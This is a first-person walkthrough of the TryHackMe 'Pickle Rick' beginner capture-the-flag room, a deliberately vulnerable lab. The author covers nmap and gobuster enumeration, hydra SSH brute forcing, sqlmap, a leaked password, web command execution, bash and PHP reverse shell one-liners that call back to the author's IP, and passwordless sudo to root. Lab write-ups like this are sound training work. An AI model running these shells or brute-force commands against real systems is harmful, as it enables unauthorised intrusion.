TryHackMe — Pickle Rick

Pickle Rick Room is part of beginner course of TryHackMe. It’s a machine where you will going to use the knowledge you gained from the OWASP top 10 and OWASP Juice Shop. It exploits the carelessness of developers and system administrators. It’s a relatively easy machine yet full of fun. Let’s begin.

Let’s begin by scanning our target using nmap port scan.

nmap -p- 10.10.144.58 -vv -oA nmap/portScanPickleRick

After we got our desire ports, we can now run another nmap version scan.

nmap -sV -sC -p 22,80 10.10.144.58 -vv -oA nmap/versionScanPickleRick

So, we only got 2 ports open, 1 for ssh port 22 and 1 for http port 80. Take note of the version of services we scanned.

Port 22 runs OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)

Port 80 runs Apache httpd 2.4.18 ((Ubuntu))

ENUMERATION

Let’s start our enumeration on port 80, we begin by loading the page.

The webpage says something about “BURP”, one of our clues, as we have discussed on my previous write-ups, my “Burp Community” is up and running everytime I visit the http page of my target machines.

Let’s try to check the web-page source, to check if it gives us some clue.

As we can see, one of the common mistakes of rookie devs is leaving comment on the web page. Now, we got a username : R1ckRul3s. I ran nikto web app scan and gobuster to discover hidden directories or files, and while doing so, I tried to brute force my way to ssh login using the username we found using hydra.

hydra -t 16 -l R1ckRul3s -P /usr/share/wordlists/rockyou.txt -vV 10.10.144.58 ssh

It gives back an error about ssh that does not support password authentication. Since I have why I am getting the error, I tried logging in to ssh using manual username and password method.

Okay, so the reason why we are getting that error using hydra is because username and password is not supported in ssh, instead we must use a key (id_rsa) in order for us to login through. That’s another clue we need to look out for.

After the nikto scan, it didn’t give us much information (or excitement) other than the Apache version we already got from nmap scan.

nikto -h 10.10.144.58

from there, let’s check the gobuster.

gobuster dir -u http://10.10.144.58/ -w /usr/share/wordlists/dirb/common.txt -x php,txt,bak,config,json

gobuster, gave us interesting files and directories.

We have directory listing on /assets/, however, there’s seems no interesting file here.

So, all the 302 responses points to login.php screen.

Here, it seems that we can bypass login, let’s check that by using sqlmap, first we need to intercept our login request and save it into a file named pickleRickLogin

then we ran sqlmap.

sqlmap -r pickleRickLogin

after sqlmap, it tells us that the parameters doesn’t seem to be injectable.

So, from here we can try to brute force our login again using hydra, but before to go deeper, let’s try to check other files we have touched or checked yet.

Checking the robots.txt from gobuster’s output.

Well, for me that’s odd, it’s not the robots.txt I expect it to be. Looks like we got some password laying around. Since ssh needs a key, let’s try to login to web using the username we got earlier and this password.

And it worked. We got ourselves a command execution page.

From here we can do a lot of things, but first let me try some basic linux command.

id
pwd
ls -la

and there goes our first flag, let’s try to read it from here.

cat Sup3rS3cretPickl3Ingred.txt

It seems that we can’t read server files from here. Now, let’s try to execute a reverse shell command, set up my netcat listener to port 53.

1st let’s try to use a bash reverse shell.

bash -i >& /dev/tcp/10.13.9.90/53 0>&1

it is not working, let’s take a look at our burp what happened.

response included some kind of base64 format string, tried decoding it.

seems that we are going nowhere here.

now, let’s try the php reverse shell command that we can find here.

php -r ‘$sock=fsockopen(“10.13.9.90”,53);$proc=proc_open(“/bin/sh -i”, array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);’

and we got a shell. Let’s try to make it more interactive one.

and we get the first flag and read the clue.txt

Let’s check for other user and files in the /home directory.

Okay, we got the second flag here. Let’s check if we can read the file.

yes, we can.

Let’s now check the /root directory.

Seems that we need to elevate to root. Let’s try to list our sudo privileges.

sudo -l

So, from the results, we can see that we can use sudo without password, we then sudo switch to root, after that, we can grab our 3rd and final flag from /root directory (and check the .ssh folder).

TAKEAWAYS

I would recommend this room to all people out there who are just starting their infosec journey like me.

It was relatively easy but very fun box, for me, there are several potential rabbit holes, that if I was just a first timer in CTF, I might waste a lot of time, (because admittedly, I wasted a lot of time on those kind of rabbit hole back then) on ssh, on login or decoding the strings.

Lastly, I think, my main takeaway here is to just go with the flow, go with what the server gives you and enjoy your hacking moments :)

“He-who-must-NOT-be-named”